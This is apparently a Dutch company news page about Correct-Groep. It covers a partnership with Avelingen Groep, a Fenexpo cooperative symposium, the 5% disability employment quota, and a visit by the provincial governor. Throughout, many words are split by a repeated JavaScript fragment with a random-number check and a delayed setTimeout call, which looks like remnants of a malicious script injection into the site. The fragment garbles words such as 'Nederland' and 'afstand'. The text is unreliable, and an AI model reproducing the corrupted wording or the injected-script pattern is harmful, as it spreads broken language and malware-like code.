Correct-Groep en Avelingen Groep gaan intensief samenwerken

GORINCHEM- Tijdens de Fenexpo Businessdagen zetten de directies van Avelingen Groep en Correct-Groep op woensdag 16 april hun handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andtekening onder een intentieverklaring. Daarin spreken zij af om opdrachtgevers samen op maat te gaan bedienen.

De vraag naar onze schoonmaakdiensten groeit,” aldus Gerda Derksen, algemeen directeur Avelingen Groep. “Correct Groep is een deskundige partner in de facilitaire dienstverlening en kan ons ondersteunen in geval van krapte in de arbeidspool en bij gespecialiseerde werkzaamheden.” Daarnaast wordt gezocht naar nieuwe mogelijkheden om meer werk te bieden aan uitkeringsgerechtigden en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere doelgroepen met een achterstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tot de arbeidsmarkt. Jan van Helden, algemeen directeur van Correct-Groep vult aan: “Wij werken al samen maar door een gezamenlijke marktbenadering, inkoop en onderlinge inzet van personeel bereiken we een nog intensievere samenwerking. Een win-win situatie voor alle partijen.”

Facilitaire Coöperatie

Symposium de Facilitaire Coöperatie: nu samenwerken belangrijker dan ooit
Paneldiscussie met Verheij Integrale Groenzorg, Correct en Avelingen Groep
Op 16 april 2014 organiseert de Facilitaire Coöperatie een symposium op het gebied van zakelijk samenwerken tijdens de Fenexpo beurs in Gorinchem. Dit symposium zal volledig in het teken staan in het beantwoorden van de vraag waarom zakelijk samenwerken zo belangrijk is. Zakelijk samenwerken kan in de vorm van een coöperatie. De facilitaire coöperatie wil kennis delen en organiseert daarom dit symposium over deze samenwerkingsvorm.
Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and heeft een groot aantal coöperaties. Sterker nog, je kunt zeggen dat coöperaties Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and hebben groot gemaakt. In dit symposium wordt duidelijk hoe deze ontwikkeling is gegaan, en welke factoren hebben bijgedragen aan dit succes. Coöperaties zijn relatief onbekend. Een interessante vraag is dan ook of en hoe deze bedrijven de PR-slag kunnen maken die beursgenoteerde bedrijven wel realiseren.
Tijdens het symposium zal Prof. Dr. Ir. Gert van Dijk een inleiding verzorgen. Van Dijk is Professor Cooperative Business op Nyenrode Business en is een autoriteit op het gebied van zakelijke samenwerking. Hij neemt luisteraars mee in een boeiend betoog over samenwerken in coöperaties. Hij geeft praktische adviezen voor startende coöperaties en gaat in op valkuilen en succesfactoren. Daarnaast gaat hij in op het bestaansrecht van een coöperatie, te weten: dienstverlening van het hoogste niveau. Van Dijk reikt enkele handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andvatten aan zodat bedrijven dit commercieel kunnen inzetten om huidige klanten te binden en potentiële klanten hiervan te overtuigen. Vervolgens vindt er een paneldiscussie plaats. Panelleden zijn: Wilco Boender, Commercieel Manager bij Verheij Integrale Groenzorg, Jan van Helden Algemeen Directeur bij Correct Groep en Gerda Derksen, Algemeen Directeur
Avelingen Groep.
Het symposium vindt plaats tijdens de Fenexpo beurs. Dit jaarlijks terugkerend evenement wordt georganiseerd in de Evenementenhal, Franklinweg 2 in Gorinchem. Het programma start om 15:30 uur. Inloop vanaf 15:00 uur. Belangstellenden kunnen zich gratis inschrijven via www.facilitaire-cooperatie.nl.
Programma
15:00: Ontvangst
15:30: Lezing Facilitaire Coöperatie Prof. Dr. Ir. Gert van Dijk
16:15: Paneldiscussie met medewerking van: Prof. Dr. Ir. Gert van Dijk, dhr. Wilco Boender (Commercieel Manager Verheij Integrale groenzorg) en dhr. Jan van Helden (Algemeen Directeur Correct Groep) en mevr. Gerda Derksen (Algemeen Directeur Avelingen Groep)
17:00: Afsluitende Borrel

Ons sociale hart

Wij helpen u aan het 5% quotum
Op de arbeidsmarkt verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andert veel. De werkloosheid stijgt. Daardoor komen mensen met een afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tot de arbeidsmarkt bijna niet meer aan het werk. Vanaf het jaar 2015 is ieder bedrijf verplicht om minimaal 5% werknemers te hebben met een afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tot de arbeidsmarkt. Correct Groep regelt dit volledig voor u. Een schone werkomgeving en voldoen aan het 5% quotum? Bij Correct Groep is dit geen probleem!
Wat gaat er verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen?
Om meer jongeren met een beperking mee te laten doen op de arbeidsmarkt zijn werkgevers nodig die hen een kans willen geven. De nieuwe Participatiewet wil dit mogelijk maken en is begin 2014 ingegaan.
Het gaat in dit quotum om arbeidsgehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andicapten. Deze term is van staatsecretaris Klijnsma. Het gaat dan vooral om mensen met een zintuiglijke beperkingen, chronische aandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andoeningen of lichamelijke beperkingen. Nu krijgen zij veelal een Wajong- of WIA-uitkering. Deze quotumregeling wordt vanaf 1 januari 2015 ingevoerd. Uiteindelijk moet vijf procent van werknemers bestaan uit jonggehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andicapten. Eind van 2016 zal er een verplichting van kracht zijn.
Wanneer een bedrijf niet aan het quotum voldoet volgt een boete van 5.000 euro per werkplaats voor een arbeidsgehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andicapte of voor iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and met een afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tot de arbeidsmarkt.
Wat kunnen wij u bieden?
Correct Groep werkt samen met gemeenten en sociale diensten in uw regio. De professionele begeleiding van deze, veelal jongeren, is in goede handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden van Correct Groep.
De schoonmaakwerkzaamheden en andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere facilitaire diensten worden door jongeren met een afstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and tot de arbeidsmarkt op een prima niveau uitgevoerd, omdat zij begeleiding krijgen van onze professionele schoonmakers.
Op deze wijze krijgt u een schone werkomgeving en voldoet u aan het 5% quotum.
U helpt arbeidsgehandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andicapten aan werk. Dit kunt u als doelstelling opnemen in uw plan voor Maatschappelijk Verantwoord Ondernemen (MVO).

Hoog bezoek

Correct Groep was op vrijdagmorgen 6 december vereerd met een bezoek van Commissaris van de Koning in Brabant, Van de Donk. Hij was bijzonder geïnteresseerd in de maatschappelijke ontwikkelingen op het gebied van zorg en veiligheid. Daarom bracht hij een bezoek aan Correct Groep om inzicht te krijgen in de ontwikkelingen die er momenteel spelen op het gebied van zorg en veiligheid. Wij hebben hem informatie gegeven over de verschillende technische mogelijkheden die er zijn om de veiligheid in de zorg te vergroten. Zo installeren wij meedenkende camera’s die het voor ouderen veiliger maken op hogere leeftijd thuis te blijven wonen. Tijdens dit bezoek hebben wij het nieuw logo onthuld, dat gepresenteerd werd op een smakelijk gebakje.